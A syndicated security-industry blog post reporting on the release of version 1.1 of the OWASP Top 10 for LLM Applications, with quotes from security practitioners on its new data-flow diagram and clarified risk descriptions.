The first revamp of the OWASP Top 10 for LLM Applications has been released. With only minor changes, version 1.1 of the Open Worldwide Application Security Project’s list of key vulnerabilities continues to advance the project team’s goal of bridging the divide between general application security principles and the challenges posed by LLMs.
To achieve that bridge, OWASP added a visual illustration of the data flow in a typical LLM application to highlight the potential areas of risk from vulnerabilities. For example, the data flow between an API and an LLM’s production services could be vulnerable to a prompt injection or a denial-of-service attack, or an application’s plugins might contain excessive vulnerabilities.
Generative AI is advancing at a breakneck pace. To keep it from breaking your organization’s back, here’s a full rundown on the changes in the OWASP Top 10 for LLMs, a starting point for your dev and app sec teams to get a handle on generative AI.
[ Join Nov. 14 Webinar: Secure by Design: Why Trust Matters for Risk Management ]
OWASP has to work fast to keep up with the changes in LLM technology; version 1.0 of the Top 10 for LLMs was released only in August.
Chris Romeo, CEO of the threat modeling company Devici, said the inclusion of the LLM application data flow chart is the most significant change in the new version.
“The data flow provides a reference architecture to help readers understand how LLM systems are assembled. Without that context, it is more challenging to understand how the LLM Top 10 risks fit together.”
—Chris Romeo
OWASP Top 10 for LLM project leader Steve Wilson, also chief product officer of Exabeam, said the language describing the risks, as well as the examples accompanying them, have been cleaned up and clarified.
“Some people were confused about the differences between some of the risks. For example, insecure output handling and excessive agency used some similar examples, although different vulnerabilities were at their core.”
—Steve Wilson
The new version of the Top 10 for LLMs also increases clarity around the descriptions and manifestations within LLM architectures for prompt injection and insecure output handling. Dan Hopkins, vice president of engineering at the API security testing firm StackHawk, said this move was essential.
“Those tests will prove to be very visible to a user and demand targeted fuzzing at runtime for effective assessment.”
—Dan Hopkins
Version 1.1 is “a significant step in the right direction,” said Hopkins. “It’s great to see version 1.1 placing a strong emphasis on enhancing the clarity and understanding of vulnerabilities within an LLM-based architecture.”
“The dataflow specifically does an amazing job highlighting where vulnerabilities exist in the stack, making it abundantly clear why black-box testing of a running application is essential for secure LLM usage,” he added.
The security community is still learning about the wide range of AI capabilities, and the OWASP Top 10 LLM 1.1 reflects that, observed Priyadharshini Parthasarathy, senior security consultant for application security at Coalfire.
“The new version includes a lot of detailed information on LLM-specific terms such as ‘pre-training data,’ the embedding process, and fine-tuning of data on how the models are being trained. This document also updated the list of scenario examples and references in the prevention and mitigation strategies.”
—Priyadharshini Parthasarathy
The top 10 risks in the latest version of the list remain unchanged from v1.0:
Future versions of the OWASP Top 10 for LLMs will need to evolve with the gen AI field itself, security experts note. Devici’s Romeo said that he, for one, wants the document to include threat language for each of the Top 10 items.
“The document contains vulnerability examples today, but threat examples would provide direct input into the threat modeling of LLM applications.”
—Chris Romeo
StackHawk’s Hopkins said it would also be great to expand the Top 10 for LLMs’ procedures for ensuring the absence of vulnerabilities.
“Adding detailed descriptions that highlight app sec techniques and their suitability for mitigating and preventing various vulnerabilities within the context of a sample architecture would be incredibly beneficial.”
—Dan Hopkins
Michael Erlihson, a principal data scientist at the API security company Salt Security, suggested that the vulnerability descriptions in the list should be expanded in a future version. Including mitigation strategies for each vulnerability would also be worthwhile for developers and security teams, he said.
“More detailed descriptions and examples of each listed vulnerability could help practitioners better understand the risks involved.”
—Michael Erlihson
Erlihson also suggested including industry-specific guidance in the list, as well as historical data on the vulnerabilities. “Historical data on how the vulnerabilities have evolved over time could provide insights into emerging threats and trends,” he said.
OWASP Top 10 for LLMs project leader Wilson said OWASP is planning two major deliverables in the near future, as well as additional rigor:
*** This is a Security Bloggers Network syndicated blog from ReversingLabs Blog authored by John P. Mello Jr.. Read the original post at: https://www.reversinglabs.com/blog/owasp-top-10-for-llm-updated-to-keep-pace-with-ai